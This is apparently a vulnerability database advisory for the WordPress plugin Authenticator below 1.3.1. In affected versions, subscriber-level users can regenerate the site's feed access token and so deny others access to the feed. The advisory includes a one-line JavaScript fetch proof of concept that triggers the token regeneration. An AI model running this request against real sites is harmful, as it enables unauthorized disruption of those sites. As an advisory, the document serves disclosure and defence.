WordPress Plugin Vulnerabilities
Authenticator < 1.3.1 - Subscriber+ Denial of Service via Feed Token Disclosure
Description
The plugin does not prevent subscribers from updating a site's feed access token, which may deny other users access to the functionality in certain configurations.
Proof of Concept
fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=regenerate_token&nonce='+authenticatorUI.nonce }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-09 (about 1 years ago)
Added
2022-12-09 (about 1 years ago)
Last Updated
2022-12-09 (about 1 years ago)